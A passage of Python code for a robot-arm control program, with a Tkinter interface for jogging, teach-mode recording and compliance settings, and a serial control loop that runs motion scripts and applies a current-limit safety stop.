start_recording_button.configure(bg ="green")
else:
start_recording_button.configure(bg ="ivory3")
p12[4] = not(p12[4])
def Stop_recording():
p12[4] = 0
start_recording_button.configure(bg ="ivory3")
p12[5] = 0
#def Execute_recording():
#if p12[5] == 0:
#execute_recording_button.configure(bg ="green")
#else:
#execute_recording_button.configure(bg ="ivory3")
#p12[5] = not(p12[5])
def Execute_recording():
p12[5] = 1
p12[6] = 0
def Show_recording():
p12[6] = 1
p12[7] = 0
def Clear_recording():
p12[7] = 1
start_recording_button = tk.Button(teach_frame,text = "Start REC",font = (letter_font,14), width = 9, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = Start_recording)
start_recording_button.place(x =870, y = 710)
stop_recording_button = tk.Button(teach_frame,text = "Stop REC",font = (letter_font,14), width = 9, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = Stop_recording)
stop_recording_button.place(x =870, y = 750)
execute_recording_button = tk.Button(teach_frame,text = "Execute REC",font = (letter_font,14), width = 9, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = Execute_recording)
execute_recording_button.place(x =870, y = 790)
show_recording_button = tk.Button(teach_frame,text = "Show REC",font = (letter_font,14), width = 9, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = Show_recording)
show_recording_button.place(x =870, y = 830)
Clear_recording_button = tk.Button(teach_frame,text = "Clear REC",font = (letter_font,14), width = 9, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = Clear_recording)
Clear_recording_button.place(x =870, y = 870)
entry_label = tk.Entry(teach_frame,font = (letter_font,14,'bold'), width = 15, borderwidth = 4,bg ="gray84")
entry_label.place(x =870, y = 675)
# Legacy stuff using GOTO position
# Command is pos
record_button_all = tk.Button(teach_frame,text = "Record all",font = (letter_font,19), width = 14, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = lambda: record_position('pos'))
record_button_all.place(x =20, y = 810)
record_button_free = tk.Button(teach_frame,text = "Record free",font = (letter_font,19), width = 14, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = lambda: record_position('pos'))
record_button_free.place(x =20, y = 860)
################################################
CSAAR_button = tk.Button(teach_frame,text = "CSAAR",font = (letter_font,19), width = 14, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = lambda: record_position('CSAAR'))
CSAAR_button.place(x =590, y = 70+43)
JTRAJ_button = tk.Button(teach_frame,text = "JTRAJ",font = (letter_font,19), width = 14, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = lambda: record_position('JTRAJ'))
JTRAJ_button.place(x =590, y = 70+90)
CTRAJ_button = tk.Button(teach_frame,text = "CTRAJ",font = (letter_font,19), width = 14, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = lambda: record_position('CTRAJ'))
CTRAJ_button.place(x =590, y = 70+90+47)
move_duration_l = tk.Label(teach_frame, text="Move duration" ,font = (letter_font,17),bg ="ivory3",highlightthickness = 0,borderwidth=3)
move_duration_l.place(x =590, y = 112-90)
entry_label_duration = tk.Entry(teach_frame,font = (letter_font,19,'bold'), width = 4, borderwidth = 4,bg ="gray84")
entry_label_duration.place(x =767, y = 110-90)
delay_button = tk.Button(teach_frame,text = "Delay",font = (letter_font,19), width = 9, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = record_delay)
delay_button.place(x =590, y = 155-90)
entry_label_delay = tk.Entry(teach_frame,font = (letter_font,19,'bold'), width = 4, borderwidth = 4,bg ="gray84")
entry_label_delay.place(x =767, y = 160-90)
def loop_command():
mytext.insert(tk.INSERT,'loop,\n')
def end_command():
mytext.insert(tk.INSERT,'end,\n')
end_button = tk.Button(teach_frame,text ="END",font = (letter_font,19), width = 6, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = end_command)
end_button.place(x =590, y = 855)
loop_button = tk.Button(teach_frame,text = "LOOP",font = (letter_font,19), width = 6, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = loop_command)
loop_button.place(x =720, y = 855)
def button_press_grav(event=None, var = 0):
grav_buttons[var].configure(bg ="green yellow")
pos_buttons[var].configure(bg ="ivory3")
p11[var] = 0
def button_press_pos(event=None, var = 0):
grav_buttons[var].configure(bg ="ivory3")
pos_buttons[var].configure(bg ="green yellow")
p11[var] = 1
def set_all(var):
if var == 'grav':
for y in range(0,6):
grav_buttons[y].configure(bg ="green yellow")
pos_buttons[y].configure(bg ="ivory3")
p11[y] = 0
if var == 'pos':
for y in range(0,6):
grav_buttons[y].configure(bg ="ivory3")
pos_buttons[y].configure(bg ="green yellow")
p11[y] = 1
def make_lambda_grav(x):
return lambda ev:button_press_grav(ev,x)
def make_lambda_pos(x):
return lambda ev:button_press_pos(ev,x)
robot_names_text = ['Base', 'Shoulder', 'Elbow', 'Wrist 1', 'Wrist 2', 'Wrist 3']
grav_buttons = []
pos_buttons = []
for cnt in range(0,6):
grav_buttons.append(tk.Button(teach_frame,text = robot_names_text[cnt],font = (letter_font,22), width = 9, height = 1,bg ="ivory3",highlightthickness = 0,borderwidth=3))
grav_buttons[cnt].place(x = 7, y = 50+cnt*50)
grav_buttons[cnt].bind('<ButtonPress-1>',make_lambda_grav(cnt))
pos_buttons.append(tk.Button(teach_frame,text = robot_names_text[cnt],font = (letter_font,22), width = 9, height = 1,bg ="green yellow",highlightthickness = 0,borderwidth=3))
pos_buttons[cnt].place(x = 300, y = 50+cnt*50)
pos_buttons[cnt].bind('<ButtonPress-1>',make_lambda_pos(cnt))
grav_all=(tk.Button(teach_frame,text = "ALL",font = (letter_font,22), wraplength=1, width = 2, height = 8,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = lambda: set_all('grav')))
grav_all.place(x = 207, y = 50)
pos_all=(tk.Button(teach_frame,text = "ALL",font = (letter_font,22), wraplength=1, width = 2, height = 8,bg ="ivory3",highlightthickness = 0,borderwidth=3,command = lambda: set_all('pos')))
pos_all.place(x = 500, y = 50)
gravity_disable_var = 1
p11[6] = gravity_disable_var
def switch_grav_disable():
global gravity_disable_var
if gravity_disable_var == 0:
grav_disable.configure(text = "Disable")
else:
grav_disable.configure(text = "Gravity")
gravity_disable_var = not(gravity_disable_var)
p11[6] = gravity_disable_var
grav_disable=(tk.Button(teach_frame,text = "Disable",font = (letter_font,22), width = 9, height = 1,bg ="ivory4",highlightthickness = 0,borderwidth=3,command = lambda: switch_grav_disable()))
grav_disable.place(x = 7, y = 355)
p12[2] = 1
def set_grav_pos():
p12[2] = not(p12[2])
set_motor_mode=(tk.Button(teach_frame,text = "Set",font = (letter_font,22), width = 9, height = 1,bg ="ivory4",highlightthickness = 0,borderwidth=3,command = lambda: set_grav_pos()))
set_motor_mode.place(x = 300, y = 355)
None
def setup_frame_stuff():
# Initialize K1,2,3,4 values to default ones
for y in range(0,rbt.Joint_num):
p13[y] = rbt.Steer_K1_default[y]
p14[y] = rbt.Steer_K2_default[y]
p15[y] = rbt.Steer_K3_default[y]
p16[y] = rbt.Steer_K4_default[y]
# When button is pressed change K1,2,3,4 values
def Change_compliance():
comp_temp = round(np.interp(Compliance_scale.get(), [0, 100], [18, 0.2]),3)
for y in range(0,rbt.Joint_num):
p13[y] = comp_temp
print(p13[y])
Current_compliance_label.configure(text="Current compliance K1 value: " + str(p13[0]) )
Compliance_setup_canvas = tk.Canvas(setup_frame, width=900, height=900,bg = "white",borderwidth=6, relief='ridge')
Compliance_setup_canvas.place(x = 0, y = 0)
Compliance_settings_l = tk.Label(setup_frame, text="Compliance settings" ,font = (letter_font,17),bg = "white")
Compliance_settings_l.place(x = 20, y = 10)
Compliance_scale = tk.Scale(setup_frame, label='Compliance in %. (100% being soft, 0 being stiff)', from_=0, to=100, orient = tk.HORIZONTAL,bg = "white",borderwidth=3,length = 400, font = (letter_font,11))
Compliance_scale.place(x = 23, y = 75)
Compliance_set_button = tk.Button(setup_frame,text = "Set",font = (letter_font,20),bg = "ivory3",command = lambda:Change_compliance())
Compliance_set_button.place(x = 350, y = 15)
Current_compliance_label = tk.Label(setup_frame, text="Current compliance K1 value: " + str(p13[0]), font = (letter_font,13),bg = "white")
Current_compliance_label.place(x = 20, y = 47)
letter_font = 'Courier New TUR' # letter font used
# http://www.science.smith.edu/dftwiki/index.php/Color_Charts_for_TKinter
main_color = 'gray63' # Color of background (This is some light blue color)
root = tk.Tk()
root.wm_attributes("-topmost", 0)
root.title('ARM control')
root.configure(background = main_color)
# This maintains fixed size of 1920x1080
# while enabling to minimise and maximise
root.maxsize(1920,1080)
root.minsize(1920,1080)
root.geometry("1920x1080")
# Create frames for other windows
move_frame = tk.Frame(root, background = main_color)
move_frame.place(x=0, y=85, width=1420, height=1010)
log_frame = tk.Frame(root, background = main_color)
log_frame.place(x=0, y=85, width=1420, height=1010)
teach_frame = tk.Frame(root, background = main_color)
teach_frame.place(x=0, y=85, width=1420, height=1010)
setup_frame = tk.Frame(root, background = main_color)
setup_frame.place(x=0, y=85, width=1420, height=1010)
#Help image and button
image_help = Image.open(os.path.join(Image_path,'helpimg4.png'))
tk_image = ImageTk.PhotoImage(image_help)
help_button = tk.Button(root, image=tk_image,borderwidth=0,highlightthickness = 0,bg = main_color) #, command=lambda aurl=url_donate:OpenUrl_donate(aurl)
help_button.place(x = 1830, y = 0)
# Buttons for window select
control_canvas = tk.Canvas(root, width=470, height=900,bg = "white",borderwidth=6, relief='ridge')
control_canvas.place(x = 1420, y = 85)
positons_label = tk.Label(root, text="Tool position:" ,font = (letter_font,18),bg = "white")
positons_label.place(x = 1450, y = 10+85)
Enable_disable = 0 # 1 is for enabled, 0 is for disabled
p12[0] = Enable_disable
def Disable_Enable():
global Enable_disable
if Enable_disable == 0:
STOP_button.configure(image=tk_STOP)
else:
STOP_button.configure(image=tk_ENABLE)
Enable_disable = not(Enable_disable)
p12[0] = Enable_disable
image_STOP = Image.open(os.path.join(Image_path,'disable_img.png'))
image_ENABLE = Image.open(os.path.join(Image_path,'enable_img.png'))
tk_STOP = ImageTk.PhotoImage(image_STOP)
tk_ENABLE = ImageTk.PhotoImage(image_ENABLE)
# Button to stop robot
STOP_button = tk.Button(root, image=tk_ENABLE,borderwidth=0,highlightthickness = 0,bg = "white",command = lambda:Disable_Enable())
STOP_button.place(x = 1760, y = 30+85)
# Button to clear error
def Clear_error_command():
gt.Clear_Error(1)
gt.Clear_Error(2)
gt.Clear_Error(3)
gt.Clear_Error(4)
gt.Clear_Error(5)
gt.Clear_Error(6)
Clear_error_button = tk.Button(root,text = "Clear error",font = (letter_font,24),bg = "ivory3",command = Clear_error_command)
Clear_error_button.place(x = 1450, y = 270+85)
# Button to close gripper
Gripper_close_button = tk.Button(root,text = "Close gripper",font = (letter_font,20),bg = "ivory3")
Gripper_close_button.place(x = 1450, y = 370+85)
# Button to open gripper
Gripper_open_button = tk.Button(root,text = "Open gripper",font = (letter_font,20),bg = "ivory3")
Gripper_open_button.place(x = 1670, y = 370+85)
move_button = tk.Button(root, text = "Move", font = (letter_font,23), width = 15, height = 1,borderwidth=3,command = lambda: raise_frame(move_frame,move_button,log_button,teach_button,setup_button,'move'))
move_button.place(x = 0, y = 2)
log_button = tk.Button(root, text = "Log", font = (letter_font,23), width = 15, height = 1,borderwidth=3 ,command = lambda: raise_frame(log_frame,log_button,move_button,teach_button,setup_button,'log'))
log_button.place(x = 285, y = 2)
teach_button = tk.Button(root, text = "Teach", font = (letter_font,23), width = 15, height = 1,borderwidth=3 ,command = lambda: raise_frame(teach_frame,teach_button,log_button,move_button,setup_button,'teach'))
teach_button.place(x = 570, y = 2)
setup_button = tk.Button(root, text = "Setup", font = (letter_font,23), width = 15, height = 1,borderwidth=3 ,command = lambda: raise_frame(setup_frame,setup_button,log_button,teach_button,move_button,'setup'))
setup_button.place(x = 855, y = 2)
# Stuff that need constant updating and here we define it
btns_progress = []
btn_nr_ = -1
ticks_label = []
Deg_label = []
RAD_label = []
Temperature_label = []
Current_label = []
pos_labels = []
pos_labels2 = []
pos_text = ['X: ','Y: ','Z: ','phi: ','theta: ','psi: ']
# Euler angles tell us how to get from out base frame that is static to one our end-effector is now.
# We do it by rotating for 'phi' around Z then 'theta' around Y and then 'psi' around Z again.
robot_names = ['Base: ', 'Shoulder: ', 'Elbow: ', 'Wrist 1: ', 'Wrist 2: ', 'Wrist 3: ']
Data_ = "#####"
# Raise move frame as default
raise_frame(move_frame,move_button,setup_button,teach_button,log_button,'move')
p12[1] = 0
move_frame_stuff()
teach_frame_stuff()
log_frame_stuff()
setup_frame_stuff()
# Create scale that allows to set speed of joints
# Scales return value from 1-100
speed_scale = tk.Scale(move_frame, from_=1, to=100, orient = tk.HORIZONTAL,bg = "white",borderwidth=3,length = 300, font = (letter_font,11))
speed_scale.place(x = 1008, y = 33)
speed_scale.set(spd_set)
# Create scale that allows to set acceleration of joints
acc_scale = tk.Scale(move_frame, from_=1, to=100, orient = tk.HORIZONTAL,bg = "white",borderwidth=3,length = 300, font = (letter_font,11))
acc_scale.place(x = 688, y = 33)
acc_scale.set(acc_set)
speed_scale_l = tk.Label(move_frame, text="Speed [%]" ,font = (letter_font,13),bg = "white")
speed_scale_l.place(x = 1008, y = 8)
acc_scale_l = tk.Label(move_frame, text="Acceleration [%]" ,font = (letter_font,13),bg = "white")
acc_scale_l.place(x = 688, y = 8)
for y in range(1,7):
# Most of this stuff is labels for jog, these lables will be updating constantly
btn_nr_ += 1
ticks_label.append(tk.Label(move_frame, text="Encoder: " + Data_,font = (letter_font,12),bg = "white"))
ticks_label[btn_nr_].place(x = 250, y = 152+btn_nr_*135)
Deg_label.append(tk.Label(move_frame, text="Degree: " + Data_,font = (letter_font,12),bg = "white"))
Deg_label[btn_nr_].place(x = 250, y = 130+btn_nr_*135)
RAD_label.append(tk.Label(move_frame, text="Radians: " + Data_,font = (letter_font,12),bg = "white"))
RAD_label[btn_nr_].place(x = 250, y = 108+btn_nr_*135)
Temperature_label.append(tk.Label(move_frame, text="Temperature: " + Data_,font = (letter_font,12),bg = "white"))
Temperature_label[btn_nr_].place(x = 425, y = 130+btn_nr_*135)
Current_label.append(tk.Label(move_frame, text="Current: " + Data_,font = (letter_font,12),bg = "white"))
Current_label[btn_nr_].place(x = 425, y = 108+btn_nr_*135)
btns_progress.append(Progressbar(move_frame, orient = tk.HORIZONTAL, length = 350, mode = 'determinate'))
btns_progress[btn_nr_].place(x = 250, y = 180+btn_nr_*135)
pos_labels.append(tk.Label(root, text=pos_text[btn_nr_] + Data_,font = (letter_font,14),bg = "white"))
pos_labels[btn_nr_].place(x = 1450, y = 45+btn_nr_*35+ 85)
pos_labels2.append(tk.Label(root, text=robot_names[btn_nr_] + Data_,font = (letter_font,14),bg = "white"))
pos_labels2[btn_nr_].place(x = 1585, y = 45+btn_nr_*35+ 85)
#### Stuff that will need to be updated after some time e.g. progress bars, x,y,z values... #########
def Stuff_To_Update():
global spd_set, acc_set
spd_set = speed_scale.get()
acc_set = acc_scale.get()
acc_scale_l.configure(text = "Acceleration " + str(acc_set) + "%")
speed_scale_l.configure(text = "Speed " + str(spd_set) + "%")
#T = robot_arm.fkine(p7) # Calculate get homogenous transformation matrix for current joint angles
# Update motor pos for only joint_num available joints
for y in range(0,rbt.Joint_num):
btns_progress[y]["value"] = int(np.interp(p6[y],rbt.Joint_limits_ticks[y],[0,100]))
btns_progress[y].update()
ticks_label[y].configure(text="Encoder: " + str(p6[y]))
Deg_label[y].configure(text="Degree: " + str(round(rbt.RAD2D(p7[y]) ,4)) + " °")
RAD_label[y].configure(text="Radians: " + str(round(p7[y], 6))) #raw_var * 0.04394531 * (np.pi / 180, 3)
Temperature_label[y].configure(text="Temperature: " + str(p9[y]) + " ℃")
Current_label[y].configure(text="Current: " + str(round(p8[y]/1000, 5)) + " A")
pos_labels2[y].configure(text= robot_names[y] +str(round(p7[y],4 )))
for y in range(0,6):
pos_labels[y].configure(text= pos_text[y] +str(round(p10[y],4 )))
root.after(95,Stuff_To_Update) # update data every 25 ms
root.after(1, Stuff_To_Update)
root.mainloop()
def do_stuff(left_btns,right_btns,raw_ENC,True_rads,spd_set,acc_set,current,temperature,True_pose,RPM_speed,True_rads_speed,grav_pos,software_control,Steer_K1,Steer_K2,Steer_K3,Steer_K4):
gt.Clear_Error(1)
gt.Clear_Error(2)
gt.Clear_Error(3)
gt.Clear_Error(4)
gt.Clear_Error(5)
gt.Clear_Error(6)
time.sleep(0.01)
gt.Change_data(1,200,3000,10000)
gt.Change_data(2,200,5000,10000)
gt.Change_data(3,200,3000,10000)
gt.Change_data(4,200,3000,10000)
gt.Change_data(5,200,3000,10000)
gt.Change_data(6,200,3000,10000)
time.sleep(0.01)
# Array where freeform recorded positions are stored
freeform_record_array = np.empty(shape=(15000,6),order='C',dtype='object')
# variable that tells us how many steps we took in our freeform recording
freeform_record_len = 0
current_freefrom_step = 0
current_freefrom_step_execute = 0
matrix_array = np.empty(shape=(0,6),order='C',dtype='object')
True_pose_var = [None] * 6 #Variable that stores pose of robot. Index in order: X,Y,Z,R,R,R
hold_var = [0] * rbt.Joint_num # Hold var is 1 if robot is holding position
Direction_var = [None] * rbt.Joint_num # None for not moving, True and False for directions
# Stuff for accelerated jogging of motors
current_speed = [0] * rbt.Joint_num
acc_cntr = [0] * rbt.Joint_num
Speed_jog_setpoint = [0] * rbt.Joint_num
Acceleration_jog_setpoint = [0] * rbt.Joint_num
###################################
prev_enable_disable = 0
Sending_stuff = 0 # if it is 0 then send dummy data if it is 1 send nothing since we are sending usefull data
prev_motor_mode_select = 1
# code execution control variables
started_execution = 0 # 0 if we are not executing script, when script is run first time it goes to 1 and stays until script stops executing
clean_string = [] # whole code of a executing script cleaned up. That means that every '\n' is removed at
code_step_cntr = 0 # tells us at what line of code we are i.e. what line of code we are executing atm
time_step_cntr = 0 # Tells us at what time we are at specific line of code
step_time = 0 # Tells us how long each line of code need to last
number_of_code_lines = 0 # Number of code lines in script
Security_flag = 0 # Tells us if security is triggered. 0 if not 1 if triggered
current_current_limit = rbt.Default_current_limits
security_stop_duration = rbt.Default_security_stop_duration
security_counter = 0
current_pos_command = [None]*rbt.Joint_num # if in pos mode. Save current commanded position here. It will be reexecuted when security is over
current_speed_command = [None]*rbt.Joint_num # if in pos mode. Save current commanded speed here. It will be reexecuted when security is over
current_command = '' # command that is being executed atm
tt = 0
while(1):
try:
bg = time.time()
# Reads all data from serial port. This function also blocks
ENC,RADS,cur,spd,spd_RAD,temp,vol,err= gt.main_comms_func()
# This gets current robot pose and write to multi proc
Enable_disable_var = software_control[0] # 0 is for disabled / 1 is for enabled
operating_mode = software_control[1]
T = robot_arm.fkine(RADS)
T2 = T*1
True_pose_var[0] = T2[0][3]
True_pose_var[1] = T2[1][3]
True_pose_var[2] = T2[2][3]
True_pose_var[3:] = T.eul('deg')
# This reads all multi process variables and writes to all multi process variables (With len of joint_num)
for y in range(0,rbt.Joint_num):
# Read multi proc
# No need for this just read the index you want
# Write multi proc
raw_ENC[y] = ENC[y]
True_rads[y] = RADS[y]
current[y] = cur[y]
temperature[y] = temp[y]
RPM_speed[y] = spd[y]
True_rads_speed[y] = spd_RAD[y]
# This reads all multi process variables and writes to all multi process variables (With len of 6)
for y in range(0,6):
# Write multi proc
True_pose[y] = True_pose_var[y]
if np.any(cur > np.array(current_current_limit)) or Security_flag == 1:
if security_counter == 0:
Security_flag = 1
gt.Strong_position_hold(1,7.5,1)
gt.Strong_position_hold(2,7.5,1)
gt.Strong_position_hold(3,7.5,1)
if security_counter >= 0 and security_counter < ((security_stop_duration / rbt.Data_interval)):
#print(security_counter)
security_counter = security_counter + 1
if security_counter == ((security_stop_duration / rbt.Data_interval)):
security_counter = 0
Security_flag = 0
if current_command == 'pos':
for y in range(0,rbt.Joint_num):
gt.GOTO_position_HOLD(y+1,current_pos_command[y],current_speed_command[y],7.5,1)
### Send dummy data when nobody else is sending data
if Sending_stuff == 0:
gt.send_dummy_data()
#print("dummy_data")
else:
#print("not_dummy_data")
None
########################
# If in teach mode
if (operating_mode == 2 or operating_mode == 0) and Enable_disable_var == 1 and Security_flag == 0:
if software_control[3] == 1: # stared exectuting script
if started_execution == 0:
text_file = open(Image_path + "/Programs/execute_script.txt",'r')
code_string = text_file.readlines()
text_file.close()
for i in range(0,len(code_string)):
if code_string[i] == '\n':
continue
else:
clean_string.append(code_string[i])
if clean_string[len(clean_string)-1] == 'end\n' or clean_string[len(clean_string)-1] == 'loop\n':
valid_data = 1
else:
valid_data = 0
started_execution = 1
code_step_cntr = 0
time_step_cntr = 0
number_of_code_lines = len(clean_string)
step_time = 0
if code_step_cntr < number_of_code_lines:
Sending_stuff = 1
if time_step_cntr == 0:
code2execute = clean_string[code_step_cntr].split(',')
code2execute = code2execute[:-1]
#print(clean_string)
print(code2execute)
if(code2execute[0] == 'pos'):
step_time = float(code2execute[1]) # data after index 1 is position data and index 1 is time data
start_pos = [None]*rbt.Joint_num
stop_pos = [None]*rbt.Joint_num
current_command = 'pos'
for y in range(0,rbt.Joint_num):
start_pos[y] = True_rads[y]
stop_pos[y] = float(code2execute[y+2])
pos_var,spd_var = rbt.GO_TO_POSE(start_pos, stop_pos,step_time)
current_pos_command = pos_var
current_speed_command = spd_var
for y in range(0,rbt.Joint_num):
gt.GOTO_position_HOLD(y+1,pos_var[y],spd_var[y],7.5,1)
# send movement shit
elif(code2execute[0] == 'CSAAR'):
step_time = float(code2execute[1]) # data after index 1 is position data and index 1 is time data
start_pos = [None]*rbt.Joint_num
stop_pos = [None]*rbt.Joint_num
current_command = 'CSAAR'
for y in range(0,rbt.Joint_num):
start_pos[y] = True_rads[y]
stop_pos[y] = float(code2execute[y+2])
matrix_array = np.empty(shape=( int( step_time / rbt.Data_interval ),6),order='C',dtype='object')
matrix_array = rbt.CSAAR(start_pos,stop_pos,step_time)
for m in range(0,rbt.Joint_num):
gt.teleop_mode(m+1,rbt.RAD2E(matrix_array[time_step_cntr][m],m),0,Steer_K1[m],Steer_K2[m],Steer_K3[m],Steer_K4[m])
elif(code2execute[0] == 'JTRAJ'):
step_time = float(code2execute[1]) # data after index 1 is position data and index 1 is time data
start_pos = [None]*rbt.Joint_num
stop_pos = [None]*rbt.Joint_num
current_command = 'JTRAJ'
for y in range(0,rbt.Joint_num):
start_pos[y] = True_rads[y]
stop_pos[y] = float(code2execute[y+2])
matrix_array = np.empty(shape=( int( step_time / rbt.Data_interval ),6),order='C',dtype='object')
temp_var = rp.tools.trajectory.jtraj(start_pos,stop_pos,int( step_time / rbt.Data_interval ))
matrix_array = temp_var.q
for m in range(0,rbt.Joint_num):
gt.teleop_mode(m+1,rbt.RAD2E(matrix_array[time_step_cntr][m],m),0,Steer_K1[m],Steer_K2[m],Steer_K3[m],Steer_K4[m])
elif(code2execute[0] == 'CTRAJ'):
step_time = float(code2execute[1]) # data after index 1 is position data and index 1 is time data
start_pos = [None]*rbt.Joint_num
stop_pos = [None]*rbt.Joint_num
current_command = 'CTRAJ'
for y in range(0,rbt.Joint_num):
start_pos[y] = True_rads[y]
stop_pos[y] = float(code2execute[y+2])
matrix_array = np.empty(shape=( int( step_time / rbt.Data_interval ),6),order='C',dtype='object')
temp_var = rp.tools.trajectory.jtraj(start_pos,stop_pos,int( step_time / rbt.Data_interval ))
matrix_array = temp_var.q
for m in range(0,rbt.Joint_num):
gt.teleop_mode(m+1,rbt.RAD2E(matrix_array[time_step_cntr][m],m),0,Steer_K1[m],Steer_K2[m],Steer_K3[m],Steer_K4[m])
elif(code2execute[0] == 'delay'):
current_command = 'delay'
step_time = float(code2execute[1])
gt.send_dummy_data()
elif(code2execute[0] == 'end'):
current_command = 'end'
code_step_cntr = 0
step_time = 0
time_step_cntr = 0
started_execution = 0
software_control[3] = 0
clean_string = []
elif(code2execute[0] == 'loop'):
current_command = 'loop'
code_step_cntr = 0
step_time = 0
time_step_cntr = 0
software_control[3] = 1
started_execution = 1
elif time_step_cntr > 0 and time_step_cntr < ((step_time / rbt.Data_interval)):
if(current_command == 'CSAAR'):
#print(rbt.RAD2E((matrix_array[time_step_cntr][5]),5))
#gt.teleop_mode(6,rbt.RAD2E(matrix_array[time_step_cntr][5],5),0,Steer_K1[5],Steer_K2[5],Steer_K3[5],Steer_K4[5])
#print(matrix_array)
for m in range(0,rbt.Joint_num):
gt.teleop_mode(m+1,rbt.RAD2E(matrix_array[time_step_cntr][m],m),0,Steer_K1[m],Steer_K2[m],Steer_K3[m],Steer_K4[m])
elif(current_command == 'JTRAJ'):
for m in range(0,rbt.Joint_num):
gt.teleop_mode(m+1,rbt.RAD2E(matrix_array[time_step_cntr][m],m),0,Steer_K1[m],Steer_K2[m],Steer_K3[m],Steer_K4[m])
else:
gt.send_dummy_data()
#print("dummy data" + str(time_step_cntr))
if time_step_cntr < ((step_time / rbt.Data_interval) ):
time_step_cntr = time_step_cntr + 1
#print(time_step_cntr)
if time_step_cntr == ((step_time / rbt.Data_interval)) and current_command != 'loop':
time_step_cntr = 0
step_time = 0
code_step_cntr = code_step_cntr + 1
elif software_control[3] == 0: # stop executing. Stops script completely, execute will rerun the script
Sending_stuff = 0
code_step_cntr = 0
step_time = 0
time_step_cntr = 0
started_execution = 0
clean_string = []
elif software_control[3] == 2: # pause executing, meaning that after you press pause press execute it will continue where it left off
Sending_stuff = 0
None
# This stuff is for enabling and disabling(gravity comp or disable) specific motors on left side panel
if prev_motor_mode_select != software_control[2]:
prev_motor_mode_select = software_control[2]
for y in range(0, rbt.Joint_num):
if grav_pos[y] == 1:
gt.Strong_position_hold(y+1,7.5,1)
if grav_pos[y] == 0 and grav_pos[6] == 1:
gt.Gravity_compensation(y+1,20,5)
if grav_pos[y] == 0 and grav_pos[6] == 0:
gt.Disable(y+1)
# Jog motors WITH acceleration
if operating_mode == 0 and Enable_disable_var == 1 and Security_flag == 0:
for y in range(0,rbt.Joint_num):
# Reads positions from sliders or slow,default,fast setting and scales for each joint
Speed_jog_setpoint[y] = np.interp(spd_set.value,[1,100],[rbt.Joint_min_speed[y],rbt.Joint_max_speed[y]])
Acceleration_jog_setpoint[y] = np.interp(acc_set.value,[1,100],[rbt.Joint_min_acc[y],rbt.Joint_max_acc[y]])
# Acceleration in negative direction of robots joint
# NOTE: directions follow right hand rule:
# * your tumb on right hand is positive direction of z axes, and fingers represent positive rotation.
# * Axes are defined by DH params
if left_btns[y] == 1 and right_btns[y] == 0:
Sending_stuff = 1
#print("jog")
current_speed[y] = rbt.Joint_min_speed[y] + acc_cntr[y] * rbt.Data_interval * Acceleration_jog_setpoint[y]
if(current_speed[y] >= Speed_jog_setpoint[y]):
current_speed[y] = Speed_jog_setpoint[y]
gt.Speed_Dir(y+1, 0 if rbt.Direction_offsets[y] == 1 else 1,rbt.RADS2RPM(current_speed[y],y))
acc_cntr[y] = acc_cntr[y] + 1
Direction_var[y] = True
hold_var[y] = 0
# Acceleration in positive direction of robots joint
if right_btns[y] == 1 and left_btns[y] == 0:
Sending_stuff = 1
#print("jog")
current_speed[y] = rbt.Joint_min_speed[y] + acc_cntr[y] * rbt.Data_interval * Acceleration_jog_setpoint[y]
if(current_speed[y] >= Speed_jog_setpoint[y]):
current_speed[y] = Speed_jog_setpoint[y]
gt.Speed_Dir(y+1, 1 if rbt.Direction_offsets[y] == 1 else 0,rbt.RADS2RPM(current_speed[y],y))
acc_cntr[y] = acc_cntr[y] + 1
Direction_var[y] = False
hold_var[y] = 0
# Deacceleration
if current_speed[y] >= rbt.Joint_min_speed[y] and left_btns[y] == 0 and right_btns[y] == 0 and hold_var[y] == 0 and Direction_var[y] != None:
Sending_stuff = 1
#print("jog")
current_speed[y] = current_speed[y] - rbt.Data_interval * Acceleration_jog_setpoint[y]
if(current_speed[y] <= rbt.Joint_min_speed[y]):
current_speed[y] = rbt.Joint_min_speed[y]
Direction_var[y] = None
if Direction_var[y] == False:
gt.Speed_Dir(y+1, 1 if rbt.Direction_offsets[y] == 1 else 0,rbt.RADS2RPM(current_speed[y],y))
elif Direction_var[y] == True:
gt.Speed_Dir(y+1, 0 if rbt.Direction_offsets[y] == 1 else 1,rbt.RADS2RPM(current_speed[y],y))
acc_cntr[y] = 0
# If no button is pressed and we stopped deaccelerating, hold position
if left_btns[y] == 0 and right_btns[y] == 0 and hold_var[y] == 0 and Direction_var[y] == None:
gt.Strong_position_hold(y+1, 7.5, 1) # OVO SU JAKO DOBRE VRIJEDNOSTI (y+1, 7.5, 1) SA 17000 UPDATE RATE samo kp 10 je ok bez struje
Sending_stuff = 0
#print("jog")
#gt.Gravity_compensation(y+1,50,5)
acc_cntr[y] = 0
hold_var[y] = 1
# When we disable robot
if Enable_disable_var == 0 and prev_enable_disable == 1:
prev_enable_disable = Enable_disable_var
gt.Gravity_compensation(1,50,3)
gt.Gravity_compensation(2,50,3)
gt.Gravity_compensation(3,50,3)
gt.Gravity_compensation(4,50,3)
gt.Gravity_compensation(5,50,3)
gt.Gravity_compensation(6,50,3)
#elif grav_pos[6] == 0:
#gt.Disable(1)
#gt.Disable(2)
#gt.Disable(3)
# When we enable robot
elif Enable_disable_var == 1 and prev_enable_disable == 0:
prev_enable_disable = Enable_disable_var
for y in range(0, rbt.Joint_num):
gt.Enable(y+1)
gt.teleop_mode(y+1,raw_ENC[y],0,Steer_K1[y],Steer_K2[y],Steer_K3[y],Steer_K4[y])
#print(time.time() - bg)
# If freeform recordiong is on
if(software_control[4] == 1 and software_control[5] == 0):
freeform_record_array[current_freefrom_step][:] = True_rads
#print(freeform_record_array[current_freefrom_step][:])
current_freefrom_step = current_freefrom_step + 1
freeform_record_len = current_freefrom_step
# If executing freeform movement
if(software_control[4] == 0 and software_control[5] == 1):
if(current_freefrom_step_execute == 0):
for y in range(0,rbt.Joint_num):
